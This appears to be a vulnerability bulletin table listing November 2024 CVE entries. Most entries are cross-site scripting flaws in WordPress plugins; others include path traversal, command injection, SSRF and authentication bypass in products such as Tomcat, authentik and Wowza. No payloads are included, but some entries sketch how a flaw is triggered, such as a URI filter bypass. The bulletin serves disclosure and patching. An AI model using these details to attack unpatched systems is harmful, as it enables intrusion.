Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mapme Mapme allows Stored XSS.This issue affects Mapme: from n/a through 1.3.2. | 2024-11-19 | not yet calculated | CVE-2024-51913 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gopi Ramasamy drop in image slideshow gallery allows DOM-Based XSS.This issue affects drop in image slideshow gallery: from n/a through 12.0. | 2024-11-19 | not yet calculated | CVE-2024-51914 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Creative Brahma Multifox Plus allows DOM-Based XSS.This issue affects Multifox Plus: from n/a through 1.1.6. | 2024-11-19 | not yet calculated | CVE-2024-51916 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Huy Le Multiple Votes in one page allows Stored XSS.This issue affects Multiple Votes in one page: from n/a through 1.0.4. | 2024-11-19 | not yet calculated | CVE-2024-51917 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Freshlight Lab Pay With Stripe allows DOM-Based XSS.This issue affects Pay With Stripe: from n/a through 1.2.1. | 2024-11-19 | not yet calculated | CVE-2024-51918 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in JDev Map Store Locator allows DOM-Based XSS.This issue affects Map Store Locator: from n/a through 1.2.1. | 2024-11-19 | not yet calculated | CVE-2024-51920 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in midori scrollup allows DOM-Based XSS.This issue affects scrollup: from n/a through 1.1. | 2024-11-19 | not yet calculated | CVE-2024-51921 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Maruf Arafat VP Sitemap allows Stored XSS.This issue affects VP Sitemap: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51922 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Websand Websand Subscription Form allows Stored XSS.This issue affects Websand Subscription Form: from n/a through 1.0.3. | 2024-11-19 | not yet calculated | CVE-2024-51923 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alexandre Magno WP Agenda allows Stored XSS.This issue affects WP Agenda: from n/a through 2.0. | 2024-11-19 | not yet calculated | CVE-2024-51924 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sazzad Hu Testimonial Slider Shortcode allows Stored XSS.This issue affects Testimonial Slider Shortcode: from n/a through 1.1.9. | 2024-11-19 | not yet calculated | CVE-2024-51925 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wpsoul GreenCon allows Stored XSS.This issue affects GreenCon: from n/a through 1.0.1. | 2024-11-19 | not yet calculated | CVE-2024-51926 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codember Rig Elements For Elementor allows DOM-Based XSS.This issue affects Rig Elements For Elementor: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51927 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jakir Hasan Blocks Post Grid allows DOM-Based XSS.This issue affects Blocks Post Grid: from n/a through 1.0.3. | 2024-11-19 | not yet calculated | CVE-2024-51928 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Phil Spectrum Icon Widget allows DOM-Based XSS.This issue affects Icon Widget: from n/a through 1.1.0. | 2024-11-19 | not yet calculated | CVE-2024-51929 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jie Wang Custom URL Shortener allows Stored XSS.This issue affects Custom URL Shortener: from n/a through 0.3.6. | 2024-11-19 | not yet calculated | CVE-2024-51930 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Marketever AzonBox allows DOM-Based XSS.This issue affects AzonBox: from n/a through 1.1.2. | 2024-11-19 | not yet calculated | CVE-2024-51931 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saif Bin-Alam Kings Tab Slider allows DOM-Based XSS.This issue affects Kings Tab Slider: from n/a through 1.0. | 2024-11-19 | not yet calculated | CVE-2024-51932 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Christian Ladewig Cookie Nonsense for YT allows DOM-Based XSS.This issue affects Cookie Nonsense for YT: from n/a through 1.2.0. | 2024-11-19 | not yet calculated | CVE-2024-51933 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Uri Lazcano (Urielink) Ekiline Block Collection allows DOM-Based XSS.This issue affects Ekiline Block Collection: from n/a through 1.0.5. | 2024-11-19 | not yet calculated | CVE-2024-51934 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sam Perrow Fast Video and Image Display allows DOM-Based XSS.This issue affects Fast Video and Image Display: from n/a through 2.5.2. | 2024-11-19 | not yet calculated | CVE-2024-51935 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Henry ESB Testimonials allows Stored XSS.This issue affects ESB Testimonials: from n/a through 1.0.0. | 2024-11-19 | not yet calculated | CVE-2024-51936 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Information Analytics IA Map Analytics Basic allows DOM-Based XSS.This issue affects IA Map Analytics Basic: from n/a through 20170413. | 2024-11-19 | not yet calculated | CVE-2024-51937 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NicheAddons Charity Addon for Elementor allows DOM-Based XSS.This issue affects Charity Addon for Elementor: from n/a through 1.3.2. | 2024-11-19 | not yet calculated | CVE-2024-51938 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Santhosh veer Stylish Internal Links allows DOM-Based XSS.This issue affects Stylish Internal Links: from n/a through 1.9. | 2024-11-18 | not yet calculated | CVE-2024-51939 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in sohelwpexpert WP Responsive Video allows DOM-Based XSS.This issue affects WP Responsive Video: from n/a through 1.0. | 2024-11-18 | not yet calculated | CVE-2024-51940 |
| n/a -- n/a |
Exposure of sensitive system information to an unauthorized control sphere issue exists in Rakuten Turbo 5G firmware version V1.3.18 and earlier. If this vulnerability is exploited, a remote unauthenticated attacker may obtain information of the other devices connected through the Wi-Fi. | 2024-11-20 | not yet calculated | CVE-2024-52033 |
| n/a -- n/a |
An OS Command Injection vulnerability exists within myPRO Manager. A parameter within a command can be exploited by an unauthenticated remote attacker to inject arbitrary operating system commands. | 2024-11-22 | not yet calculated | CVE-2024-52034 |
| n/a -- n/a |
Wowza Streaming Engine below 4.9.1 permits an authenticated Streaming Engine Manager administrator to define a custom application property and poison a stream target for high-privilege remote code execution. | 2024-11-21 | not yet calculated | CVE-2024-52052 |
| n/a -- n/a |
Stored Cross-Site Scripting in the Manager component of Wowza Streaming Engine below 4.9.1 allows an unauthenticated attacker to inject client-side JavaScript into the web dashboard to automatically hijack admin accounts. | 2024-11-21 | not yet calculated | CVE-2024-52053 |
| n/a -- n/a |
Path Traversal in the Manager component of Wowza Streaming Engine below 4.9.1 allows an administrator user to create an XML definition file anywhere on the file system. | 2024-11-21 | not yet calculated | CVE-2024-52054 |
| n/a -- n/a |
Path Traversal in the Manager component of Wowza Streaming Engine below 4.9.1 allows an administrator user to read any file on the file system if the target directory contains an XML definition file. | 2024-11-21 | not yet calculated | CVE-2024-52055 |
| n/a -- n/a |
Path Traversal in the Manager component of Wowza Streaming Engine below 4.9.1 allows an administrator user to delete any directory on the file system if the target directory contains an XML definition file. | 2024-11-21 | not yet calculated | CVE-2024-52056 |
| n/a -- n/a |
Apache NiFi 1.16.0 through 1.28.0 and 2.0.0-M1 through 2.0.0-M4 include optional debug logging of Parameter Context values during the flow synchronization process. An authorized administrator with access to change logging levels could enable debug logging for framework flow synchronization, causing the application to write Parameter names and values to the application log. Parameter Context values may contain sensitive information depending on application flow configuration. Deployments of Apache NiFi with the default Logback configuration do not log Parameter Context values. Upgrading to Apache NiFi 2.0.0 or 1.28.1 is the recommendation mitigation, eliminating Parameter value logging from the flow synchronization process regardless of the Logback configuration. | 2024-11-21 | not yet calculated | CVE-2024-52067 |
| n/a -- n/a |
authentik is an open-source identity provider. When using the client_credentials or device_code OAuth grants, it was possible for an attacker to get a token from authentik with scopes that haven't been configured in authentik. authentik 2024.8.5 and 2024.10.3 fix this issue. | 2024-11-21 | not yet calculated | CVE-2024-52287 |
| n/a -- n/a |
authentik is an open-source identity provider. Redirect URIs in the OAuth2 provider in authentik are checked by RegEx comparison. When no Redirect URIs are configured in a provider, authentik will automatically use the first redirect_uri value received as an allowed redirect URI, without escaping characters that have a special meaning in RegEx. Similarly, the documentation did not take this into consideration either. Given a provider with the Redirect URIs set to https://foo.example.com, an attacker can register a domain fooaexample.com, and it will correctly pass validation. authentik 2024.8.5 and 2024.10.3 fix this issue. As a workaround, When configuring OAuth2 providers, make sure to escape any wildcard characters that are not intended to function as a wildcard, for example replace `.` with `\.`. | 2024-11-21 | not yet calculated | CVE-2024-52289 |
| n/a -- n/a |
aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. In versions starting with 3.10.6 and prior to 3.10.11, a memory leak can occur when a request produces a MatchInfoError. This was caused by adding an entry to a cache on each request, due to the building of each MatchInfoError producing a unique cache entry. An attacker may be able to exhaust the memory resources of a server by sending a substantial number (100,000s to millions) of such requests. Those who use any middlewares with aiohttp.web should upgrade to version 3.10.11 to receive a patch. | 2024-11-18 | not yet calculated | CVE-2024-52303 |
| n/a -- n/a |
aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.10.11, the Python parser parses newlines in chunk extensions incorrectly which can lead to request smuggling vulnerabilities under certain conditions. If a pure Python version of aiohttp is installed (i.e. without the usual C extensions) or `AIOHTTP_NO_EXTENSIONS` is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections. Version 3.10.11 fixes the issue. | 2024-11-18 | not yet calculated | CVE-2024-52304 |
| n/a -- n/a |
authentik is an open-source identity provider. Due to the usage of a non-constant time comparison for the /-/metrics/ endpoint it was possible to brute-force the SECRET_KEY, which is used to authenticate the endpoint. The /-/metrics/ endpoint returns Prometheus metrics and is not intended to be accessed directly, as the Go proxy running in the authentik server container fetches data from this endpoint and serves it on a separate port (9300 by default), which can be scraped by Prometheus without being exposed publicly. authentik 2024.8.5 and 2024.10.3 fix this issue. Since the /-/metrics/ endpoint is not intended to be accessed publicly, requests to the endpoint can be blocked by the reverse proxy/load balancer used in conjunction with authentik. | 2024-11-21 | not yet calculated | CVE-2024-52307 |
| n/a -- n/a |
SFTPGo is a full-featured and highly configurable SFTP, HTTP/S, FTP/S and WebDAV server - S3, Google Cloud Storage, Azure Blob. One powerful feature of SFTPGo is the ability to have the EventManager execute scripts or run applications in response to certain events. This feature is very common in all software similar to SFTPGo and is generally unrestricted. However, any SFTPGo administrator with permission to run a script has access to the underlying OS/container with the same permissions as the user running SFTPGo. This is unexpected for some SFTPGo administrators who think that there is a clear distinction between accessing the system shell and accessing the SFTPGo WebAdmin UI. To avoid this confusion, running system commands is disabled by default in 2.6.3, and an allow list has been added so that system administrators configuring SFTPGo must explicitly define which commands are allowed to be configured from the WebAdmin UI. | 2024-11-21 | not yet calculated | CVE-2024-52309 |
| n/a -- n/a |
Unchecked Error Condition vulnerability in Apache Tomcat. If Tomcat is configured to use a custom Jakarta Authentication (formerly JASPIC) ServerAuthContext component which may throw an exception during the authentication process without explicitly setting an HTTP status to indicate failure, the authentication may not fail, allowing the user to bypass the authentication process. There are no known Jakarta Authentication components that behave in this way. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M26, from 10.1.0-M1 through 10.1.30, from 9.0.0-M1 through 9.0.95. Users are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fix the issue. | 2024-11-18 | not yet calculated | CVE-2024-52316 |
| n/a -- n/a |
Incorrect object re-cycling and re-use vulnerability in Apache Tomcat. Incorrect recycling of the request and response used by HTTP/2 requests could lead to request and/or response mix-up between users. This issue affects Apache Tomcat: from 11.0.0-M23 through 11.0.0-M26, from 10.1.27 through 10.1.30, from 9.0.92 through 9.0.95. Users are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fixes the issue. | 2024-11-18 | not yet calculated | CVE-2024-52317 |
| n/a -- n/a |
Incorrect object recycling and reuse vulnerability in Apache Tomcat. This issue affects Apache Tomcat: 11.0.0, 10.1.31, 9.0.96. Users are recommended to upgrade to version 11.0.1, 10.1.32 or 9.0.97, which fixes the issue. | 2024-11-18 | not yet calculated | CVE-2024-52318 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Mage Cast Mage Front End Forms allows Stored XSS.This issue affects Mage Front End Forms: from n/a through 1.1.4. | 2024-11-18 | not yet calculated | CVE-2024-52339 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Marty Thornley Photographer Connections allows Stored XSS.This issue affects Photographer Connections: from n/a through 1.3.1. | 2024-11-18 | not yet calculated | CVE-2024-52340 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Offshorent Solutions Pvt Ltd. | Jinesh.P.V OS Our Team allows Stored XSS.This issue affects OS Our Team: from n/a through 1.7. | 2024-11-18 | not yet calculated | CVE-2024-52341 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Offshorent Solutions Pvt Ltd. | Jinesh.P.V OS BXSlider allows Stored XSS.This issue affects OS BXSlider: from n/a through 2.6. | 2024-11-18 | not yet calculated | CVE-2024-52342 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Offshorent Softwares Pvt. Ltd. | Jinesh.P.V OS Pricing Tables allows Stored XSS.This issue affects OS Pricing Tables: from n/a through 1.2. | 2024-11-18 | not yet calculated | CVE-2024-52343 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Muhammad Junaid Provide Forex Signals allows Stored XSS.This issue affects Provide Forex Signals: from n/a through 1.0. | 2024-11-18 | not yet calculated | CVE-2024-52344 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Roberto Alicata ra_qrcode allows Stored XSS.This issue affects ra_qrcode: from n/a through 2.1.0. | 2024-11-18 | not yet calculated | CVE-2024-52345 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Javier Méndez Veira SimpleGMaps allows Stored XSS.This issue affects SimpleGMaps: from n/a through 1.0. | 2024-11-18 | not yet calculated | CVE-2024-52346 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP website creator Website remote Install vor Gravity, WPForms, Formidable, Ninja, Caldera allows Stored XSS.This issue affects Website remote Install vor Gravity, WPForms, Formidable, Ninja, Caldera: from n/a through 4.0. | 2024-11-18 | not yet calculated | CVE-2024-52347 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in aaextention AA Audio Player allows DOM-Based XSS.This issue affects AA Audio Player: from n/a through 1.0. | 2024-11-18 | not yet calculated | CVE-2024-52348 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Md. Shiddikur Rahman Awesome Tool Tip allows DOM-Based XSS.This issue affects Awesome Tool Tip: from n/a through 1.0. | 2024-11-18 | not yet calculated | CVE-2024-52349 |
| n/a -- n/a |
IBM Concert Software 1.0.0, 1.0.1, 1.0.2, and 1.0.2.1 could allow an authenticated user to perform unauthorized actions that should be reserved to administrator used due to improper access controls. | 2024-11-19 | not yet calculated | CVE-2024-52359 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Mike "Mikeage" Miller Hebrew Date allows Stored XSS.This issue affects Hebrew Date: from n/a through 2.1.0. | 2024-11-19 | not yet calculated | CVE-2024-52388 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Job Portal allows Stored XSS.This issue affects WP Job Portal: from n/a through 2.2.0. | 2024-11-18 | not yet calculated | CVE-2024-52389 |
| n/a -- n/a |
: Path Traversal: '.../...//' vulnerability in CYAN Backup allows Path Traversal.This issue affects CYAN Backup: from n/a through 2.5.3. | 2024-11-18 | not yet calculated | CVE-2024-52390 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in nopea.Media Print PDF Generator and Publisher allows Stored XSS.This issue affects Print PDF Generator and Publisher: from n/a through 1.1.6. | 2024-11-18 | not yet calculated | CVE-2024-52394 |
| n/a -- n/a |
Missing Authorization vulnerability in QunatumCloud Floating Buttons for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Floating Buttons for WooCommerce: from n/a through 2.8.8. | 2024-11-19 | not yet calculated | CVE-2024-52395 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in ???? Hacklog DownloadManager allows Upload a Web Shell to a Web Server.This issue affects Hacklog DownloadManager: from n/a through 2.1.4. | 2024-11-19 | not yet calculated | CVE-2024-52401 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Cliconomics Exclusive Content Password Protect allows Upload a Web Shell to a Web Server.This issue affects Exclusive Content Password Protect: from n/a through 1.1.0. | 2024-11-19 | not yet calculated | CVE-2024-52402 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in BoldThemes ReConstruction allows Reflected XSS.This issue affects ReConstruction: from n/a through 1.4.7. | 2024-11-18 | not yet calculated | CVE-2024-52417 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CactusThemes Gameplan allows Reflected XSS.This issue affects Gameplan: from n/a through 1.5.10. | 2024-11-18 | not yet calculated | CVE-2024-52418 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Creative Motion Disable Admin Notices individually allows Cross Site Request Forgery.This issue affects Disable Admin Notices individually: from n/a through 1.3.5. | 2024-11-19 | not yet calculated | CVE-2024-52420 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in wp-buy WP Popup Window Maker allows Stored XSS.This issue affects WP Popup Window Maker: from n/a through 2.0. | 2024-11-19 | not yet calculated | CVE-2024-52421 |
| n/a -- n/a |
Missing Authentication for Critical Function vulnerability in Saul Morales Pacheco Banner System allows Privilege Escalation.This issue affects Banner System: from n/a through 1.0.0. | 2024-11-20 | not yet calculated | CVE-2024-52437 |
| n/a -- n/a |
Missing Authentication for Critical Function vulnerability in deco.Agency de:branding allows Privilege Escalation.This issue affects de:branding: from n/a through 1.0.2. | 2024-11-20 | not yet calculated | CVE-2024-52438 |
| n/a -- n/a |
Deserialization of Untrusted Data vulnerability in Mark O'Donnell Team Rosters allows Object Injection.This issue affects Team Rosters: from n/a through 4.6. | 2024-11-20 | not yet calculated | CVE-2024-52439 |
| n/a -- n/a |
Deserialization of Untrusted Data vulnerability in Bueno Labs Pvt. Ltd. Xpresslane Fast Checkout allows Object Injection.This issue affects Xpresslane Fast Checkout: from n/a through 1.0.0. | 2024-11-20 | not yet calculated | CVE-2024-52440 |
| n/a -- n/a |
Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability in Rajesh Thanoch Quick Learn allows Object Injection.This issue affects Quick Learn: from n/a through 1.0.1. | 2024-11-20 | not yet calculated | CVE-2024-52441 |
| n/a -- n/a |
Incorrect Privilege Assignment vulnerability in Userplus UserPlus allows Privilege Escalation.This issue affects UserPlus: from n/a through 2.0. | 2024-11-20 | not yet calculated | CVE-2024-52442 |
| n/a -- n/a |
Deserialization of Untrusted Data vulnerability in Nerijus Masikonis Geolocator allows Object Injection.This issue affects Geolocator: from n/a through 1.1. | 2024-11-20 | not yet calculated | CVE-2024-52443 |
| n/a -- n/a |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WPOPAL Opal Woo Custom Product Variation allows Path Traversal.This issue affects Opal Woo Custom Product Variation: from n/a through 1.1.3. | 2024-11-20 | not yet calculated | CVE-2024-52444 |
| n/a -- n/a |
Deserialization of Untrusted Data vulnerability in Modeltheme QRMenu Restaurant QR Menu Lite allows Object Injection.This issue affects QRMenu Restaurant QR Menu Lite: from n/a through 1.0.3. | 2024-11-20 | not yet calculated | CVE-2024-52445 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Buying Buddy Buying Buddy IDX CRM allows Object Injection.This issue affects Buying Buddy IDX CRM: from n/a through 1.1.12. | 2024-11-20 | not yet calculated | CVE-2024-52446 |
| n/a -- n/a |
Path Traversal: '.../...//' vulnerability in Corporate Zen Contact Page With Google Map allows Path Traversal.This issue affects Contact Page With Google Map: from n/a through 1.6.1. | 2024-11-20 | not yet calculated | CVE-2024-52447 |
| n/a -- n/a |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WebCodingPlace Ultimate Classified Listings allows PHP Local File Inclusion.This issue affects Ultimate Classified Listings: from n/a through 1.4. | 2024-11-20 | not yet calculated | CVE-2024-52448 |
| n/a -- n/a |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Navneil Naicer Bootscraper allows PHP Local File Inclusion.This issue affects Bootscraper: from n/a through 2.1.0. | 2024-11-20 | not yet calculated | CVE-2024-52449 |
| n/a -- n/a |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Official pro coders nBlocks allows PHP Local File Inclusion.This issue affects nBlocks: from n/a through 1.0.2. | 2024-11-20 | not yet calculated | CVE-2024-52450 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Aaron Robbins Post Ideas allows SQL Injection.This issue affects Post Ideas: from n/a through 2. | 2024-11-20 | not yet calculated | CVE-2024-52451 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Brainvireinfo Dynamic URL SEO allows Reflected XSS.This issue affects Dynamic URL SEO: from n/a through 1.0. | 2024-11-20 | not yet calculated | CVE-2024-52470 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in petesheppard84 Extensions for Elementor allows Reflected XSS.This issue affects Extensions for Elementor: from n/a through 2.0.37. | 2024-11-20 | not yet calculated | CVE-2024-52471 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Weather Atlas Weather Atlas Widget allows Reflected XSS.This issue affects Weather Atlas Widget: from n/a through 3.0.1. | 2024-11-20 | not yet calculated | CVE-2024-52472 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Sandeep Verma HTML5 Lyrics Karaoke Player allows Reflected XSS.This issue affects HTML5 Lyrics Karaoke Player: from n/a through 2.4. | 2024-11-20 | not yet calculated | CVE-2024-52473 |
| n/a -- n/a |
Graylog is a free and open log management platform. The reporting functionality in Graylog allows the creation and scheduling of reports which contain dashboard widgets displaying individual log messages or metrics aggregated from fields of multiple log messages. This functionality, as included in Graylog 6.1.0 & 6.1.1, is vulnerable to information leakage triggered by multiple concurrent report rendering requests from authorized users. When multiple report renderings are requested at the same start time, the headless browser instance used to render the PDF will be reused. Depending on the timing, either a check for the browser instance "freshness" hits, resulting in an error instead of the report being returned, or one of the concurrent report rendering requests "wins" and this report is returned for all report rendering requests that do not return an error. This might lead to one user getting the report of a different user, potentially leaking indexed log messages or aggregated data that this user normally has no access to. This problem is fixed in Graylog 6.1.2. There is no known workaround besides disabling the reporting functionality. | 2024-11-18 | not yet calculated | CVE-2024-52506 |
| n/a -- n/a |
Cachi2 is a command-line interface tool that pre-fetches a project's dependencies to aid in making the project's build process network-isolated. Prior to version 0.14.0, secrets may be shown in logs when an unhandled exception is triggered because the tool is logging locals of each function. This may uncover secrets if tool used in CI/build pipelines as it's the main use case. Version 0.14.0 contains a patch for the issue. No known workarounds are available. | 2024-11-19 | not yet calculated | CVE-2024-52582 |
| n/a -- n/a |
The WesHacks GitHub repository provides the official Hackathon competition website source code for the Muweilah Wesgreen Hackathon. The page `schedule.html` before 17 November 2024 or commit 93dfb83 contains links to `Leostop`, a site that hosts a malicious injected JavaScript file that occurs when bootstrap is run as well as jquery. `Leostop` may be a tracking malware and creates 2 JavaScript files, but little else is known about it. The WesHacks website remove all references to `Leostop` as of 17 November 2024. | 2024-11-18 | not yet calculated | CVE-2024-52583 |
| n/a -- n/a |
Autolab is a course management service that enables auto-graded programming assignments. There is a vulnerability in version 3.0.1 where CAs can view or edit the grade for any submission ID, even if they are not a CA for the class that has the submission. The endpoints only check that the CAs have the authorization level of a CA in the class in the endpoint, which is not necessarily the class the submission is attached to. Version 3.0.2 contains a patch. No known workarounds are available. | 2024-11-18 | not yet calculated | CVE-2024-52584 |
| n/a -- n/a |
Autolab is a course management service that enables auto-graded programming assignments. There is an HTML injection vulnerability in version 3.0.1 that can affect instructors and CAs on the grade submissions page. The issue is patched in version 3.0.2. One may apply the patch manually by editing line 589 on `gradesheet.js.erb` to take in feedback as text rather than html. | 2024-11-18 | not yet calculated | CVE-2024-52585 |
| n/a -- n/a |
StepSecurity's Harden-Runner provides network egress filtering and runtime security for GitHub-hosted and self-hosted runners. Versions of step-security/harden-runner prior to v2.10.2 contain multiple command injection weaknesses via environment variables that could potentially be exploited under specific conditions. However, due to the current execution order of pre-steps in GitHub Actions and the placement of harden-runner as the first step in a job, the likelihood of exploitation is low as the Harden-Runner action reads the environment variable during the pre-step stage. There are no known exploits at this time. Version 2.10.2 contains a patch. | 2024-11-18 | not yet calculated | CVE-2024-52587 |
| n/a -- n/a |
2FAuth is a web app to manage Two-Factor Authentication (2FA) accounts and generate their security codes. Versions prior to 5.4.1 are vulnerable to stored cross-site scripting due to improper headers in direct access to uploaded SVGs. The application allows uploading images in several places. One of the accepted types of image is SVG, which allows JS scripting. Therefore, by uploading a malicious SVG which contains JS code, an attacker which is able to drive a victim to the uploaded image could compromise that victim's session and access to their tokens. Version 5.4.1 contains a patch for the issue. | 2024-11-20 | not yet calculated | CVE-2024-52597 |
| n/a -- n/a |
2FAuth is a web app to manage Two-Factor Authentication (2FA) accounts and generate their security codes. Two interconnected vulnerabilities exist in version 5.4.1 a SSRF and URI validation bypass issue. The endpoint at POST /api/v1/twofaccounts/preview allows setting a remote URI to retrieve the image of a 2fa site. By abusing this functionality, it is possible to force the application to make a GET request to an arbitrary URL, whose content will be stored in an image file in the server if it looks like an image. Additionally, the library does some basic validation on the URI, attempting to filter our URIs which do not have an image extension. However, this can be easily bypassed by appending the string `#.svg` to the URI. The combination of these two issues allows an attacker to retrieve URIs accessible from the application, as long as their content type is text based. If not, the request is still sent, but the response is not reflected to the attacker. Version 5.4.1 fixes the issues. | 2024-11-20 | not yet calculated | CVE-2024-52598 |
| n/a -- n/a |
Statmatic is a Laravel and Git powered content management system (CMS). Prior to version 5.17.0, assets uploaded with appropriately crafted filenames may result in them being placed in a location different than what was configured. The issue affects front-end forms with `assets` fields and other places where assets can be uploaded, although users would need upload permissions anyway. Files can be uploaded so they would be located on the server in a different location, and potentially override existing files. Traversal outside an asset container is not possible. This path traversal vulnerability has been fixed in 5.17.0. | 2024-11-19 | not yet calculated | CVE-2024-52600 |
| n/a -- n/a |
Use of hard-coded cryptographic key issue exists in "Kura Sushi Official App Produced by EPARK" for Android versions prior to 3.8.5. If this vulnerability is exploited, a local attacker may obtain the login ID and password for the affected product. | 2024-11-20 | not yet calculated | CVE-2024-52614 |
| n/a -- n/a |
SourceCodester Sentiment Based Movie Rating System 1.0 is vulnerable to SQL Injection in /msrps/movies.php. | 2024-11-19 | not yet calculated | CVE-2024-52675 |
| n/a -- n/a |
A stored cross-site scripting (XSS) vulnerability in the Configuration page of Piwigo v14.5.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Page banner parameter. | 2024-11-20 | not yet calculated | CVE-2024-52701 |
| n/a -- n/a |
A stored cross-site scripting (XSS) vulnerability in the component install\index.php of MyBB v1.8.38 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Name parameter. | 2024-11-20 | not yet calculated | CVE-2024-52702 |
| n/a -- n/a |
DI-8100 v16.07.26A1 is vulnerable to Buffer Overflow In the ip_position_asp function via the ip parameter. | 2024-11-19 | not yet calculated | CVE-2024-52711 |
| n/a -- n/a |
In TOTOLINK X6000R V9.4.0cu.1041_B20240224 in the shttpd file, the Uci_Set Str function is used without strict parameter filtering. An attacker can achieve arbitrary command execution by constructing the payload. | 2024-11-22 | not yet calculated | CVE-2024-52723 |
| n/a -- n/a |
